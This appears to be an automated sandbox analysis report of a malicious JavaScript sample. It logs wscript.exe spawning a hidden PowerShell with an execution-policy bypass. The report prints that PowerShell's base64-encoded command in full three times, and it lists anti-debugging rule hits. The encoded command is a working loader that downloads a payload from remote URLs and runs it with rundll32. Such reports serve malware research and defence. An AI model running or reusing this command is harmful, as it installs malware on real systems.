Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 18, 2023, 9:25 a.m. | May 18, 2023, 9:29 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus
2224-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="
2372
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA=" |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA=" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
